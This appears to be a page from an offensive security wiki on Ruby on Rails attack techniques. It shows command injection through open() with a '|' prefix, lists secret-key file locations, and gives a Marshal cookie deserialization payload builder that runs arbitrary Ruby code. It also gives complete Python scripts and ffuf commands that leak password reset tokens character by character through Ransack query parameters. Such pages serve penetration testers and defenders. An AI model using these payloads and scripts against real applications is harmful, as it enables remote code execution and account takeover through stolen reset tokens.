Ruby on Rails
A common web framework for the Ruby Programming Language
Command Execution
In Ruby, if you can execute any code a simple `
will allow you to execute system commands:
`touch a` # Runs command without output (reverse shell)
puts `id` # Prints output
Security Pitfalls
In Ruby, Kernel
is the standard module, and its functions do not need to be prefixed with Kernel.
, meaning Kernel.open()
and open()
are equivalent. A different function however is File.open()
, which sounds like it should do the same thing.
One important difference however is that the open()
function allows subprocesses to be created by prefixing with the |
pipe symbol:
open("|id") do |file|
puts file.read
end
# uid=1001(user) gid=1001(user) groups=1001(user)
File.open("|id") do |file|
puts file.read
end
# No such file or directory @ rb_sysopen - |id (Errno::ENOENT)
If you have control over the start of such a path, you can inject a |
pipe symbol to execute commands. While you often also have Directory Traversal when starting a path with /
, this attack does not require the /
slash character and may get through a filter that tries to prevent it.
Regular Expressions
In ruby you can match a string to some regex in two simple ways:
a="some text containing abbbbc to match"
if a =~ /ab+c/
puts "match"
end
if a.match(/ab+c/)
puts "match"
end
These two ways are identical to each other, but not the same as many other programming languages. The uniqueness is that Regular Expressions are multi-line by default.
a="foo\nbar"
if a =~ /^foo$/ # Tries to match only "foo"
puts "match" # "bar" gets injected
end
URL Parameters
Similarly to PHP, Ruby on Rails allows you to put arrays in query parameters:
?user[]=first&user[]=second
This will result in a params
variable like this:
{"user" => ["first","second"]}
You can even use named array keys to create objects inside:
?user[name]=hacker&user[password]=hunter2
{"user" => {"name" => "hacker", "password" => "hunter2"}}
Finally, you can create nil
values by not providing a value, which might break some things:
?user[name]
{"user" => {"name" => nil}}
See 1.1.2 - Multiparameter attributes and 1.1.3 - POST/PUT text/xml for more input tricks like these.
Sessions
You can do a lot if you can find the Secret Key used for verifying sessions. Some common locations are:
config/environment.rb
config/initializers/secret_token.rb
config/secrets.yml
/proc/self/environ
(if it's just given via an environment variable)
Forging sessions
First of all, you can of course sign your own data to create arbitrary objects that might bypass authentication or anything else. See this code as an example to serialize your own data.
Insecure Deserialization
Ruby on Rails cookies use Marshal serialization to turn objects into strings, and then back into objects for deserialization.
For Ruby 3 you can use a piece of code like this to create a marshal payload executing any Ruby code:
def build_cookie
code = "eval('whatever ruby code')"
marshal_payload = Rex::Text.encode_base64(
"\x04\x08" +
"o" +
":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy" +
"\x07" +
":\x0E@instance" +
"o" + ":\x08ERB" + "\x06" +
":\x09@src" +
Marshal.dump(code)[2..-1] +
":\x0C@method" + ":\x0Bresult"
).chomp
digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new("SHA1"),
SECRET_TOKEN, marshal_payload)
marshal_payload = Rex::Text.uri_encode(marshal_payload)
"#{marshal_payload}--#{digest}"
end
For more recent versions, the following post describes a different deserialization chain:
More References
Ransack Data Exfiltration
The popular Ransack Ruby library allows developers to query a database in the form of objects. On version < 4.0.0 (Released: Feb 9, 2023), there is a big risk of mass assignment in query parameters that perform these filters. The client often provides a query where they can specify what attributes to filter for with conditions like cont
(contains) or start
(starts with). These can be pointed to sensitive data like password reset tokens by an attacker and exfiltrated character-by-character by the named filters.
Take this vulnerable code example:
# User class with sensitive data, has posts
class User < ActiveRecord::Base
validates :email, :username, presence: true
attr_accessor :password_hash, :reset_password_token
has_many posts
end
# Post class to be queries, belongs to a user
class Post < ActiveRecord::Base
validates :title, :content, presence: true
belongs_to :user
end
# Vulnerable page with user input
def search
@q = Post.ransack(params[:q])
@posts = @q.result(distinct: true)
end
Here the search
page uses params[:q]
from the client to query the Post
class, which is indended to be searched for a title
or content
.
Then, a URL like /search?q[title_cont]=hacking
will respond with all posts with a title containing "hacking". First is the path to the attribute: title
, and then comes the Predictate: cont
, separated by an _
underscore.
The vulnerability here however, is when we provide a sensitive attribute, which is easy as the path to the attribute can be deeper by separating them by underscores. If we want to find the reset_password_token
for example, this is inside of the user
:
/search?q=[user_reset_password_token_cont]=hacking
. This query will return something if there is a user with "hacking" in their password reset token, but this can be abused by doing a character-by-character brute-force attack where we provide all possible starting characters and find which give a response back, indicating it was found:
GET /posts?q[user_reset_password_token_start]=0 -> Empty results page
GET /posts?q[user_reset_password_token_start]=1 -> Empty results page
GET /posts?q[user_reset_password_token_start]=2 -> Results in page
Afterward, we know a token starts with 2
, and we can simply try all other characters after it:
GET /posts?q[user_reset_password_token_start]=20 -> Empty results page
GET /posts?q[user_reset_password_token_start]=21 -> Empty results page
...
GET /posts?q[user_reset_password_token_start]=2c -> Empty results page
GET /posts?q[user_reset_password_token_start]=2d -> Results in page
By continually doing this, eventually, we find for example q[user_reset_password_token]=2dd0571e439813f7
which shows the entire token is correct, and we have leaked it in only a few requests.
Leaking such hexadecimal token can look something like this:
import requests
from tqdm import tqdm # Progress bar
HOST = "http://localhost:4567" # TARGET
ALPHABET = b"0123456789abcdef"
token = b""
for length in tqdm(range(16), desc="Length", leave=False):
for c in tqdm(ALPHABET, desc=f"{length}", leave=False):
prefix = token + bytes([c])
params = { # Check with start (case insensitive)
"q[user_reset_password_token_start]": prefix.decode(),
}
r = requests.get(HOST + "/search", params=params)
if len(r.text) > 5000: # Treshold for results
token += bytes([c])
tqdm.write(repr(token))
break
else: # If nothing new found, we are done
break
token = token.decode()
print("Found case-insensitive:", token)
In this case, we found the sensitive user
and reset_password_token
attributes by reading the code, but in a more black-box scenario where you only notice the pattern of
?q[attr_predicate]=
some guessing is required. Tools like ffuf
can fuzz for these attributes by providing the FUZZ
keyword in the correct part of a URL:
$ ffuf -u 'http://localhost:4567/search?q[OBJ_PROP_eq]=random6bQ1kL' -w objs.txt:OBJ -w props.txt:PROP -fs 7301
...
[Status: 200, Size: 521, Words: 56, Lines: 15, Duration: 3ms]
* OBJ: user
* PROP: reset_password_token
[Status: 200, Size: 521, Words: 56, Lines: 15, Duration: 5ms]
* OBJ: user
* PROP: name
[Status: 200, Size: 521, Words: 56, Lines: 15, Duration: 3ms]
* OBJ: user
* PROP: id
In the example above, we try to find an object and property that when _eq
is put on it, returns false because it is not found. Then the size is smaller and different from when the attribute is wrong, as then it is ignored returning all results in a static size.
This behavior depends, as in some cases a wrong guess will instead give no results, requiring you to change the fuzzing. A strategy for this would be to create a (mostly) always-true query like
?q[OBJ_PROP_cont]=_
asking for the property to contain at least one character (_
= wildcard).
Case Insensitive Predicates
An important note, however, is the fact that the start
predicate is case-insensitive, meaning using just this technique we won't know the casing of a token. For a hexadecimal token, this is no problem, but for a Base64 token, it is important to get this correct.
There is no easy way to make start
case-sensitive, but there are alternative predicates that are case-sensitive like eq
(SQL =
) or cont
(SQL LIKE
). Not all databases perform LIKE
case-sensitively, some popular ones that do include PostgreSQL and Oracle DB.
While MySQL/MariaDB, SQLite, or Microsoft SQL do not. It is easy to test if this is the case by searching for a string with the wrong casing using the eq
or cont
predicates.
Commonly eq
will work case-insensitively making it possible to guess all different combinations of casing for a token. If you found a token like a2b
, you can try a2b
, A2b
, a2B
, and A2B
to find the correct one. Then, use this correct token to reset the password, or whatever else the sensitive data lets you do. Here is an implementation:
# Try change with all cases
def all_casings(input_string):
if not input_string:
yield ""
else:
first = input_string[:1]
if first.lower() == first.upper():
for sub_casing in all_casings(input_string[1:]):
yield first + sub_casing
else:
for sub_casing in all_casings(input_string[1:]):
yield first.lower() + sub_casing
yield first.upper() + sub_casing
for cased_token in tqdm(list(all_casings(token)), desc="Casing", leave=False):
params = { # Check with equals (case sensitive)
"q[user_reset_password_token_eq]": cased_token,
}
r = requests.get(HOST + "/search", params=params)
if '<li>' in r.text: # Treshold for results
break
print("Found case-sensitive: ", cased_token)
Binary Search
If the targetted data is numeric, it is possible to use the lt
(less than) or lteq
(less than or equal) predicates to compare a range of values all at once. This algorithm is called Binary Search and can drastically speed up your attack. Here is a simple implementation that leaks the number
attribute from user
:
def test(guess):
"""if target is lower than guess (not equal)"""
params = {
"q[user_number_lt]": guess,
}
r = requests.get(HOST + "/search", params=params)
return len(r.text) > 5000
def binary_search(lo=0, hi=10000):
while lo < hi:
mid = (lo + hi + 1) // 2
if test(mid):
hi = mid - 1
else:
lo = mid
return lo
A more advanced example is achieving Binary Search for string attributes. We require a way to test multiple values at once, to test a range (half of the possible values) at once. It turns out, the start_any
predicate (similar to cont_any
) can do this for us! It requires an array and performs the regular start
predicate with all the strings in that array, and if one is found, it is successful.
We can make use of this by specifying half of the possible continuations as an array in the query parameters, which will return results if the next character is in any of them, achieving Binary Search once again.
Some important things to note are firstly the fact that Ruby (and many other frameworks) accept arrays as query parameters by duplicating the names and appending []
like
?array[]=1&array[]=2
to create array=["1","2"]
. We use this to generate the required strings. These strings need to be the known prefix so far, and half of the possible characters. If we know prefix="se"
the guesses will be ["sea", "seb", "sec", ...]
.
Here is an example implementation:
import requests
HOST = "http://localhost:4567"
ALPHABET = list("0123456789abcdefghijklmnopqrstuvwxyz")
def test(prefix, guess):
# Create array of possible continuations
l = [prefix + c for c in ALPHABET[:guess]]
# Pass array as query parameters
params = [("q[user_reset_password_token_start_any][]", s) for s in l]
r = requests.get(HOST + "/search", params=params)
return '<li>' in r.text
def binary_search(prefix, lo=0, hi=len(ALPHABET)):
while lo < hi:
mid = (lo + hi + 1) // 2
if test(prefix, mid):
hi = mid - 1
else:
lo = mid
return ALPHABET[lo] if lo < len(ALPHABET) else None
if __name__ == "__main__":
prefix = ""
while result := binary_search(prefix):
prefix += result
print(prefix)
In every situation, binary search will be faster than linear search, but the difference is largest when ALPHABET
is largest. If this is N
, the average time for both will be:
Linear Search:
N/2
(N=50 -> 25 attempts)Binary Search:
log2(N)
(N=50 -> 6 attempts)
Last updated